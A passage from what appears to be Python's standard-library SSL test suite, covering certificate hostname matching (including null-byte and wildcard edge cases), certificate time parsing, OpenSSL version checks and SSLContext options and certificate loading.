self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if support.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if support.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2}
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
